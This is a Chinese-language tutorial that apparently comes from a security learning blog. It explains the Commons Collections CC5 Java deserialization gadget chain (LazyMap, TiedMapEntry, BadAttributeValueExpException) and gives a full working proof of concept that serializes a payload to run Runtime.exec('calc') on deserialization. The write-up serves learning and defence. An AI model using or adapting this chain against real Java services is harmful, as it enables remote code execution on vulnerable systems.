环境准备

和cc1一样

分析

尾部的命令执行部分,和cc链1一样

1
2
3
4
5
6
7
8
9
10
11
12
Class c = Runtime.class;

        Transformer[] T = {
        new ConstantTransformer(c),
        new InvokerTransformer("getDeclaredMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
        new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
        new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };

        ChainedTransformer chainedTransformer = new ChainedTransformer(T);
        Map<Object,Object> map = new HashMap();
        Map map1  = LazyMap.decorate(map, chainedTransformer);

只是对LazyMap的的get方法调用换了方法

1
TiedMapEntry tiedMapEntry = new TiedMapEntry(map1, "111");

img

这里选择了TideMapEntry类的getValue方法调用了get

img

tostring方法调用了getValue方法

toString方法是在BadAttributeValueExpException中调用

1
2
3
4
5
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
        Class m = BadAttributeValueExpException.class;
        Field f = m.getDeclaredField("val");
        f.setAccessible(true);
        f.set(badAttributeValueExpException, tiedMapEntry);

这里传入null的作用是

img

防止提前执行(利用反射,类似urlDNS链)

整体

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.management.BadAttributeValueExpException;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

import static org.apache.commons.collections.map.LazyMap.*;

public class cc5 {
    public static void main(String[] args) throws Exception {
        Class c = Runtime.class;

        Transformer[] T = {
        new ConstantTransformer(c),
        new InvokerTransformer("getDeclaredMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
        new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
        new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };

        ChainedTransformer chainedTransformer = new ChainedTransformer(T);
        Map<Object,Object> map = new HashMap();
        Map map1  = LazyMap.decorate(map, chainedTransformer);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(map1, "111");
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
        Class m = BadAttributeValueExpException.class;
        Field f = m.getDeclaredField("val");
        f.setAccessible(true);
        f.set(badAttributeValueExpException, tiedMapEntry);
        searilize(badAttributeValueExpException);
        unsearilize("ser.bin");




//        Class c = Runtime.class;
//        Method m = c.getDeclaredMethod("getRuntime",null);
//        m.setAccessible(true);
//        Object o = m.invoke(null,null);
//        Method m2 = c.getDeclaredMethod("exec",String.class);
//        m2.setAccessible(true);
//        m2.invoke(o,"calc");

        

    }
    public static void searilize(Object o) throws Exception {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        objectOutputStream.writeObject(o);
    }
    public static Object unsearilize(String s) throws Exception {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(s));
        return objectInputStream.readObject();
    };
}